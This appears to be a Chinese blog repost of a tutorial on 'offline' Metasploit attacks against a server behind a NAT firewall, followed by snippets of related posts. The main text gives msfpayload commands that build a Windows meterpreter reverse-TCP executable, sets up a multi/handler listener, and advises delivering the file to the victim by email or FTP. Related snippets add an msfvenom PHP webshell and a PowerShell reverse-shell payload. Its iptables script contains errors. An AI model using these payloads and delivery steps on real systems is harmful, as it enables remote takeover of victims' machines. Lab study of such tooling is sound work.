MSF 离线攻击

最新推荐文章于 2023-07-03 09:54:59 发布
最新推荐文章于 2023-07-03 09:54:59 发布
阅读量357 收藏 1
点赞数 1
原文链接:http://www.cnblogs.com/networking/p/4100318.html
版权

MSF 离线攻击

 MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。

实验拓扑如下:

 

实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。

Linux iptables 策略如下:

#bin/bash

Fw=/sbin/iptables

$fw –P INPUT DROP

$fw –P FORWARD ACCEPT
$fw –P OUTPUT ACCEPT

echo 1 >/proc/sys/net/ipv4/ip_forward

$FW -t nat -A POSTROUTING -o em1 -s 192.168.1.0/24 -j SNAT -to 61.67.1.200

Iptables-save

此时攻击者就无法主动发起TCP建立请求和位于防火墙后的服务器192.168.1.100/24建立连接,MSF连环攻击也就无法实现。因而在这种环境中需要使用MSF的离线攻击。

实现MSF离线攻击的步骤如下:

1、  生成离线攻击脚本

#cd  /pentest/exploits/frameworks3

/pentest/exploits/frameworks3# ./msfpayload  windows/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=38438  X>/home/soft/msf38438.exe

说明:生成反向tcp连接脚本 服务器的IP为10.0.0.3 服务器使用的TCP端口为38438 生成的脚本存放的路径为/home/soft,文件名为 msf38438.exe

 

2、  创建TCP反向连接服务

#msfconsole

msf>use exploit/multi/handler

msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler)>set LHOST 10.0.0.3

msf exploit(handler)>set PORT 38438

 

3、 启动服务

 

4、  将生成的离线攻击包通过其他手段(邮件、FTP)等传送到受害者服务器,如下:

 

只要受害者服务器上该程序被执行即可。

5、  在攻击者的服务器端查看连接

 

6、  查看是否获取系统控制权

 

转载于:https://www.cnblogs.com/networking/p/4100318.html

weixin_30656145
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成webshell攻击服务器
afei001
03-22 965
实验环境 攻击机:kali   IP:192.168.3.157 靶机:win 10(已搭建WAMP) 生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3453
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
Kali密码攻击之——离线攻击工具
TK_Share的博客
06-12 1684
在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均为creddump套件,的一部分 Chntpw 用来修改Windows SAM文件实现系统密码修改,亦可在kali作为启动盘时做删除密码的用途 这里有一个该工具使用的链接http://blog.csdn.net/pyufftj/article/details/20387189 Crunch 实用的密码字典生
Kali密码攻击离线攻击工具(一)
miao_9的博客
04-09 3001
Kali密码攻击离线攻击工具(一)在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决。1 Creddump套件Kali Linux下离线攻击工具中的Cache-dump、lsadump与pwdump均为creddump套件的一部分,基于python的哈希抓取工具,项目地址:http://code.google.com/p/creddump/source
msf攻击Mysql服务.docx
04-26
本文详细介绍了通过msf对MySQL服务器进行攻击的过程,文中列出了每一个步骤,并详细列出了使用的命令。
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali-linux 工具Metasploit离线攻击使用教程
最新发布
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境中工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)
热门推荐
大方子
08-24 1万+
前言 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!!...
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2654
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
Powershell 配合msf无文件攻击
洋洋的小黑屋
04-27 1657
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 410
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 945
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
bt5 note [5] msf运用层攻击
www.i201314.net
07-10 921
MSF 图形话界面:armitage 一、连环攻击       hosts (代替了db_hosts)  (上次扫描的结果放入数据库,可以直接hosts -h查看更多选项)       hosts -d (db_del_host 192.168.1.104 )  (清空数据库)       services(代替了 db_services) (查看数据库服务)      db_nma
msf攻击载荷生成器
我还在的博客
10-06 1633
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
经典攻击示范--离线攻击--HASH值传递
辉小鱼的博客
07-03 107
即使我们不知道目标系统存在哪些漏洞,如果我们能够将攻击载荷放在目标系统中,也是能够获取目标系统的权限的。*在这里使用简单的方法,Kali启用HTTP服务器,Windows 7通过网页访问Kali下载木马文件。*在哪个目录下启用HTTP服务,该目录就为分享文件的根目录。是净荷生成和编码的组合,它在2015年6月8日取代了。*选择不同的编码方式用于逃避AV的检查。Msfvenom 查看Payload。msf已经监听并建立到目标系统的连接。Msfvenom查看输出格式。Msfvenom编码。
利用MSF攻击Android
qq_45746768的博客
07-08 3808
利用Metasploit攻击Android
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4127
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
msf攻击oracle数据库
09-06
然而,关于MSF攻击Oracle数据库的具体信息,并未在提供的引用内容中找到相关信息。因此,我无法提供有关MSF攻击Oracle数据库的详细步骤。如果您有更多的引用内容或其他相关信息,请提供给我,我将尽力给出更详细的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值